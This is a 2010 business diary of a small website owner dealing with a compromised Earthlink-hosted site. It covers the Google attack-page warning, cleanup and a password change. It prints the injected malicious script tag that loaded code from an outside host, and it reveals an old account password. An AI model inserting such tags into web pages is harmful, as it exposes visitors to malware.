THE WELCH COMPANY
440 Davis Court #1602
San Francisco, CA 94111-2496
415 781 5700
rod@welchco.com
S U M M A R Y
DIARY: September 7, 2010 04:20 PM Tuesday;
Rod Welch
Earthlink allowed access to welchco.com add scripts to HTML files.
1...Summary/Objective
2...Password Earthlink Changed
..............
Click here to comment!
CONTACTS
0201 - Earthlink, Inc.
020101 - Mr. Enrique Cxxxxx
020102 - Customer Representative
020104 - Billing Department
SUBJECTS
Virus Website Attack Welchco com Reported Attack Page Google Blocked
1603 -
1603 - ..
1604 - Summary/Objective
1605 -
160501 - Follow up ref SDS 17 0000. ref SDS 16 0000.
160502 -
160503 -
160504 -
160505 -
160506 -
160508 - ..
1606 -
1607 -
1608 - Background
1609 -
160901 - On 100610 Bryant assisted in opening Wells Fargo checking account,
160902 - that includes ATM services. ref SDS 6 CR7J
160904 - ..
160905 - On 100806 received call from someone (a woman) who has prepared papers
160906 - to change the joint account set up with Millie on 100610 1110,
160907 - ref SDS 6 KD5I, into a single person account.
160909 - ..
160910 - On 100809 0910 meeting at Wells Fargo bank to close joint account with
160911 - Millie and open new sole owner account. ref SDS 12 8349
160913 - ..
160914 - On 100816 1238 received Visa debit card for making charges to the
160915 - checking account without writing checks. ref SDS 15 KD5I
160917 - ..
160918 - On 100816 2104 changed Earthlink billing to reflect new account with
160919 - Millie's death on 100729. ref SDS 16 KD5I
160921 - ..
160922 - On 100825 1037 discovered welchco.com home page reports a virus attack
160923 - on the Internet. Called Earthlink for assistance, and they reported
160924 - there are no improper nor extraneous files on welchco.com directory.
160925 - ref SDS 17 KD5I
160927 - ..
160928 - On 100907 1620 discovered script added to index.htm on welchco.com;
160929 - removed the script and notified Earthlnk. ref SDS 0 KD5I Research
160930 - indicates should immediately change ftp password. ref SDS 0 EJ58
160931 -
160932 -
160934 - ..
1610 -
1611 -
1612 - Progress
1613 -
161301 - More research suggested that a "script" may have been added to
161302 - welchco.com files on the Internet that redirect access to welchco.com
161303 - to another website URL that is infected with a virus, and so
161304 -
161305 - Reported Attack Page
161306 -
161307 - ...Google notice prevents access to Firefox users accessing
161308 - welchco.com.
161310 - ..
161311 - Checked source file on the Internet for index.htm on welchco.com
161312 - URL...
161314 - ..
161315 - The local file was last updated on 060601. ref SDS 1 0001
161317 - ..
161318 - At the bottom of index.htm is the following...
161319 -
161320 - types"
161321 - <!.script *ype=*text/java*cript"
161322 - src="http://nuttypiano.com/Scroll_Bar.js">
161323 - </script> <!--e22a84c59ade72b442e091f3fc7de03b-->
161325 - ..
161326 - This is not part of the original code, and so seems to have been added
161327 - by someone, somehow without authorization, assistance, nor knowledge
161328 - of the Welch Company.
161330 - ..
161331 - To correct the problem, deleted index.htm from the welchco.com, and
161332 - used ftp to upload the original source file without the script string
161333 - at the bottom of the file.
161335 - ..
161336 - Research on nuttypiano.com indicates it is caused by compromised ftp
161337 - password.
161339 - ..
161340 - Called Earthlink. 100825 1037, ref SDS 17 KD5I
161342 - ..
161343 - Talked to Carla.
161345 - ..
161346 - Carla still does not see any scripts on welchco.com that could be
161347 - causing "Reported Attack Page," which aligns with Ryan's report a few
161348 - weeks ago on 100825 1037. ref SDS 17 PQ8V
161350 - ..
161351 - Carla said her supervisor suggests deleting everything from
161352 - welchco.com and reloading all of it. Review shows there are 16K files
161353 - and 7K folders. This would be a lot of work.
161355 - ..
161356 - Asked to speak with supervisor.
161357 -
161358 -
161360 - ..
1614 -
1615 -
1616 - 1742
161701 - ..
161702 - Talked to supervisor.............. Anna.
161704 - ..
161705 - Initially reviewed the record of telecon with Ryan on 100825, and
161706 - asked Anna if Earthlink feels this is good guidance on solving the
161707 - problem.
161709 - ..
161710 - Anna requested a letter transmitting the record of telecon with Ryan
161711 - on 100825, in order to more carefully and accurately understand what
161712 - Earthlink told the customer. ref SDS 17 PQ8V
161714 - ..
161715 - Submitted a letter to Anna saying...
161716 -
161717 - 1. Subject: Google Report Attack Page welchco.com
161718 - Date: Tue, 07 Sep 2010 17:52:37 -0400
161722 - ..
161723 - 2. Dear Anna,
161725 - ..
161726 - 3. Here are understandings from telecon with Rayn in your office
161727 - on Aug 25, 2010. ref SDS 17 PQ8V
161729 - ..
161730 - 4. Please let me know what more needs to be done to correct this
161731 - problem, and prevent future occurrence.
161733 - ..
161734 - 5. Thanks.
161736 - ..
161737 - 6. Rod
161738 -
161740 - ..
1618 -
1619 -
1620 - 1751
1621 -
162101 - Anna received the letter linked to the record of telecon with Ryan on
162102 - 100825. She indicated Ryan correctly presented Earthlink's guidance
162103 - for solving the problem, reported on 100825 1037. ref SDS 17 PQ8V
162105 - ..
162106 - Anna further feels that since we found an extraneous script today and
162107 - removed it, Google can be notified to remove the notice of "Report
162108 - Attack Page."
162109 -
162110 - [On 100908 1230 letter to Earthlink commends Anna's work
162111 - for successfully lifting Google's notice of "Report Attack
162112 - Page" on welchco.com. ref SDS 19 GE9M
162114 - ..
162115 - Upon discussion, Anna decided that on behalf of Earthlink she will
162116 - implement Google guidance for removing the "Report Attack Page," which
162117 - says in part...
162118 -
162119 - http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.welchco.com/
162121 - ..
162122 - If you are the owner of this web site, you can request a review
162123 - of your site using Google Webmaster Tools. More information
162124 - about the review process is available in Google's Webmaster
162125 - Help Center.
162127 - ..
162128 - Anna off line to coordinate with Google on fixing problem with
162129 - Welchco.com and Earthlink security failure.
162130 -
162131 - [On 100908 1230 access to welchco.com restored using
162132 - Netscape Mozilla Firefox browser with maximum security
162133 - settings, ref SDS 19 KD5I, and as a result of removing a
162134 - script found at the bottom of index.htm for welchco.com,
162135 - and Anna coordinating to implement Google guidance on
162136 - removing "Report Attack Page," per above, ref SDS 0 LF78,
162137 - displayed on all welchco files on the Internet accessed
162138 - from home page, first reported on 100825 1037. ref SDS 17
162139 - KD5I
162141 - ..
162142 - [On 100908 1230 letter to Earthlink commends Anna's work
162143 - for successfully lifting Google's notice of "Report Attack
162144 - Page" on welchco.com. ref SDS 19 GE9M
162145 -
162147 - ..
1622 -
1623 -
1624 - 1833
1625 -
162501 - Anna reported that she completed communication with Google to notify
162502 - that script has been removed causing "Report Attack Page," and asking
162503 - Google to scan the site again.
162505 - ..
162506 - Anna received a reply from Google saying they will notify Earthlink
162507 - in an hour or so of their findings on scanning welchco.com site
162508 - again.
162510 - ..
162511 - Anna is going off shift in an hour. She will leave instructions for
162512 - her replacement supervisor, Len, for her to follow up and verify that
162513 - Google reports the site is now clear, or there is still a problem of
162514 - some kind that requires further repair.
162515 -
162516 - [...below received letter from Earthlink, reporting no
162517 - report from Google on correcting problem of "Report Attack
162518 - Page" on welchco.com. ref SDS 0 4S4K
162520 - ..
162521 - [On 100908 1230 access to welchco.com restored using
162522 - Netscape Mozilla Firefox browser with maximum security
162523 - settings, ref SDS 19 KD5I, and as a result of removing a
162524 - script found at the bottom of index.htm for welchco.com,
162525 - and Anna coordinating to implement Google guidance on
162526 - removing "Report Attack Page," per above, ref SDS 0 LF78,
162527 - displayed on all welchco files on the Internet accessed
162528 - from home page, first reported on 100825 1037. ref SDS 17
162529 - KD5I
162531 - ..
162532 - [On 100908 1230 letter to Earthlink commends Anna's work
162533 - for successfully lifting Google's notice of "Report Attack
162534 - Page" on welchco.com. ref SDS 19 GE9M
162536 - ..
162537 - Anna is sending a letter confirming this work plan.
162538 -
162540 - ..
1626 -
1627 -
1628 - 1838
1629 -
162901 - Received Anna's letter saying...
162902 -
162903 - 1. Subject: Re: Google Report Attack Page welchco.com
162904 - Date: Tue, 7 Sep 2010 18:38:09 -0400 (EDT)
162905 - From: dizoa@support.earthlink.net
162906 - To: Rod Welch
162908 - ..
162909 - 2. Hi,
162910 -
162911 - I understand that an hour and a half you have removed a
162912 - malicious code from your index page and in doing that we would
162913 - need to request again google to review your website files for
162914 - them to ba able to remove the report attack site page
162916 - ..
162917 - 3. On your behalf, I have already request from the Google
162918 - webmaster tools page to request a malware review. This may
162919 - actually take some time for them to do and later on we just
162920 - need to log back in to the webmaster tools to check on the
162921 - result:
162923 - ..
162924 - 4. Link to it is :
162925 -
162926 - https://www.google.com/webmasters/tools/home?hl=en
162928 - ..
162929 - 5. I will be endorsing this issue to the next supervisor to check
162930 - the result of the malware review request that I have done on
162931 - the google webmaster tools.
162932 -
162933 - [...below received letter from Earthlink, reporting no
162934 - report from Google on correcting problem of "Report Attack
162935 - Page" on welchco.com. ref SDS 0 4S4K
162937 - ..
162938 - [On 100908 1230 access to welchco.com restored using
162939 - Netscape Mozilla Firefox browser with maximum security
162940 - settings, ref SDS 19 KD5I, and as a result of removing a
162941 - script found at the bottom of index.htm for welchco.com,
162942 - and Anna coordinating to implement Google guidance on
162943 - removing "Report Attack Page," per above, ref SDS 0 LF78,
162944 - displayed on all welchco files on the Internet accessed
162945 - from home page, first reported on 100825 1037. ref SDS 17
162946 - KD5I
162948 - ..
162949 - [On 100908 1230 letter to Earthlink commends Anna's work
162950 - for successfully lifting Google's notice of "Report Attack
162951 - Page" on welchco.com. ref SDS 19 GE9M
162953 - ..
162954 - 6. I have also asked the supervisor to call you back at
162955 - 415-*** **** for updates.
162957 - ..
162958 - 7. Note: For security reasons, do not email your username and
162959 - password. Please call Earthlink Web Hosting at (800) 955-0186
162960 - if you have other questions about your service.
162962 - ..
162963 - 8. CONFIDENTIALITY NOTICE: The information contained in this
162964 - e-mail message, including any attachments, is for the sole use
162965 - of the intended recipient(s) and may contain confidential and
162966 - privileged information. Any unauthorized review, use,
162967 - disclosure or distribution is prohibited. If you are not the
162968 - intended recipient, and have received this communication in
162969 - error, please contact the sender by reply e-mail and destroy
162970 - all copies of the original message.
162971 -
162972 -
162974 - ..
1630 -
1631 -
1632 - 1902
1633 -
163301 - Ross recommends changing password to welchco.com for ftp ops.
163302 -
163303 - The password was created on 080319. ref SDS 3 BV85
163305 - ..
163306 - How do we change password to upload files to welchco.com?
163308 - ..
163309 - Tried to open "My Account" on Earthlink Internet using the link
163310 - provided in letters from Earthlink (needs cookies on in IE)...
163311 -
163312 - https://myaccount.earthlink.net/cam/login.jsp?redirect=%2Fcam%2Findex.jsp&x=-1399657974
163314 - ..
163315 - This failed, and so is a new problem. Could not use access
163316 - identification that worked for updating billing accounts on 100816
163317 - 2104. ref SDS 16 FV42
163318 -
163319 - [...below on 100907 1620 at 0031 called Earthlink and got
163320 - assistance changing the password. ref SDS 0 KO9N
163322 - ..
163323 - [On 100908 1230 testing shows new password now working for
163324 - ftp ops. ref SDS 19 GE9M
163326 - ..
163327 - [On 100908 1220 at 1829 discovered Earthlink fixed problem
163328 - so that new password is now working. ref SDS 19 4S4Y
163329 -
163330 -
163332 - ..
1634 -
1635 -
1636 - 0050
1637 -
163701 - Received letter from Earthlink saying...
163702 -
163703 - 1. Subject: Google Malware Request Review
163704 - Date: Wed, 8 Sep 2010 12:45:50 +0800
163705 - From: "[ELNK WH Support] Arvee" <francisco1@support.earthlink.net>
163706 - To:
163708 - ..
163709 - 2. Hi Rod,
163710 -
163711 - Goody Day! I'm writing this email in behalf of Anna.
163713 - ..
163714 - I've monitored Google for any updates regarding the the Malware
163715 - Review Request that Anna processed for you, unfortunately,
163716 - there are no updates yet regarding your concern. [...referring
163717 - to Anna's work reported today on 100907 1620 at 1833, per
163718 - above. ref SDS 0 0R3B and confirmed in Anna's letter received
163719 - at 1838, per above. ref SDS 0 PT83...]
163720 -
163721 - [...below on 100907 1620 responded to Earthlink notifying
163722 - that virus problem invading welchco.com on Earthlink
163723 - servers still not cleared, and new problem of new password
163724 - not working for ftp ops. ref SDS 0 OK5X
163726 - ..
163727 - [On 100908 1230 access to welchco.com restored using
163728 - Netscape Mozilla Firefox browser with maximum security
163729 - settings, ref SDS 19 KD5I, and as a result of removing a
163730 - script found at the bottom of index.htm for welchco.com,
163731 - and Anna coordinating to implement Google guidance on
163732 - removing "Report Attack Page," per above, ref SDS 0 LF78,
163733 - displayed on all welchco files on the Internet accessed
163734 - from home page, first reported on 100825 1037. ref SDS 17
163735 - KD5I
163737 - ..
163738 - [On 100908 1230 letter to Earthlink commends Anna's work
163739 - for successfully lifting Google's notice of "Report Attack
163740 - Page" on welchco.com. ref SDS 19 GE9M
163742 - ..
163743 - I'm very sure that Anna would be on top of this once she is in
163744 - the office at 8 or 9 am EST. She also informed me that if any
163745 - updates comes up, she will be in contact with you, either by
163746 - email or through phone. I apologize for the inconvinience, but
163747 - we assure you that we are doing the best that we can to get
163748 - this resolved as soon as possible. Thank you for
163749 - understanding.
163750 -
163757 -
163758 -
163759 -
163760 -
163761 -
1638 -
SUBJECTS
Virus Attack Page Google Report Domain name: Welchco.com Network Cen
2803 -
2804 - 0031
280501 - ..
280502 - Password Earthlink Changed
280503 -
280504 - To resolve problem of virus invading SDS records on welchco.com, per
280505 - above, ref SDS 0 KD5I, investigated source page for Communication
280506 - Metrics home page, index.htm, and discovered someone evidently
280507 - compromised the password required to upload files to welchco.com
280508 - domain, and added a "virus" script at the bottom. ref SDS 0 BJ3G The
280509 - solution was to delete compromised index.htm file, and upload the
280510 - correct version. ref SDS 0 EJ53 Anna, the Earthlink supervisor then
280511 - contacted Google to request another evaluation of welchco.com records
280512 - on the web site. ref SDS 0 M18Q
280514 - ..
280515 - As a result of difficulty using My Account on line, per above,
280516 - ref SDS 0 PT5F, late this evening, called Earthlink at the number
280517 - reported on 100825 1037, ref SDS 17 KD5I
280519 - ..
280520 - Talked to Mike.
280522 - ..
280523 - Mike changed password to...
280527 - ..
280528 - This changes password for ftp and to access My Account for web
280529 - hosting, reported in the record on 100816 2104. ref SDS 16 FV42
280530 -
280531 - [On 100912 0948 password to access "My Account" for email
280532 - on Earthlink is different from password for web hosting.
280533 - ref SDS 20 KH3M
280535 - ..
280536 - Earthlink case number....................... 155308001
280537 -
280538 - [On 100908 1230 discovered Earthlink fixed the problem
280539 - ref SDS 19 KD5I
280540 -
280541 - [On 100908 1230 new problem to fix password access, was
280542 - assigned another problem #. ref SDS 19 WP8K
280544 - ..
280545 - Then had to update SDS code to apply new password for seamless ftp
280546 - ops.
280548 - ..
280549 - Updated SDS code for ftp developed on 060614 1510. ref SDS 2 CH8Y
280551 - ..
280552 - The only file to change....
280554 - ..
280555 - Line 60, ref OF 1 QP7J, -label format in c: 01 04 009040
280556 - Line 60, ref OF 3 QP7J, -label format in c: 01 14 009040
280557 -
280558 - -label format
280559 - loc_cur 3 1
280560 - split
280563 -
280564 - Changed ftp script to new password, per above. ref SDS 0 KH6F
280566 - ..
280567 - Tried new password with ftp program, and this failed. Worked with
280568 - old password.
280569 -
280570 - [...below letter notifies Earthlink new password for
280571 - welchco.com not working. ref SDS 0 OK6Q
280572 -
280573 - [On 100908 1230 testing shows new password now working for
280574 - ftp ops. ref SDS 19 GE9M
280575 -
280577 - ..
2806 -
2807 -
2808 - 0100
2809 -
280901 - Sent a letter Earthlink...
280902 -
280903 - 1. Subject: Google Malware Request Review
280904 - Date: Wed, 08 Sep 2010 01:10:22 -0400
280911 - ..
280912 - 2. Thanks for the update on Anna's work earlier today on fixing
280913 - the problem Google is reporting on welchco.com hosted on
280914 - Earthlink, per above, ref SDS 0 KD5I, as shown in your letter
280915 - received a few minutes. ref SDS 0 9F8N
280916 -
280917 - [On 100908 1230 access to welchco.com restored using
280918 - Netscape Mozilla Firefox browser with maximum security
280919 - settings, ref SDS 19 KD5I, and as a result of removing a
280920 - script found at the bottom of index.htm for welchco.com,
280921 - and Anna coordinating to implement Google guidance on
280922 - removing "Report Attack Page," per above, ref SDS 0 LF78,
280923 - displayed on all welchco files on the Internet accessed
280924 - from home page, first reported on 100825 1037. ref SDS 17
280925 - KD5I
280927 - ..
280928 - [On 100908 1230 letter to Earthlink commends Anna's work
280929 - for successfully lifting Google's notice of "Report Attack
280930 - Page" on welchco.com. ref SDS 19 GE9M
280932 - ..
280933 - 3. I just called and talked to Mike. He changed my password to
280934 - reduce exposure to future attacks on my website. ref SDS 0 KO9N
280935 - I just tried to FTP my site, and could not log on with the new
280936 - password. ref SDS 0 8A4G Is there a delay between getting the
280937 - password and using it? If not, I need to verify the password.
280938 - We did this by telephone, but may have had a pronunciation
280939 - issue.
280941 - ..
280942 - 4. I just tried the new password to access My Account. Entered by
280943 - email address and the new password, and nothing happens. Tried
280944 - the old password - poims - and that failed also.
280945 -
280946 - [On 100908 1230 testing shows new password now working for
280947 - ftp ops. ref SDS 19 GE9M
280949 - ..
280950 - 5. Need help.
280951 -
280957 -
280958 -
280959 -
280960 -
280961 -
280962 -
280963 -
280964 -
2810 -
Distribution. . . . See "CONTACTS"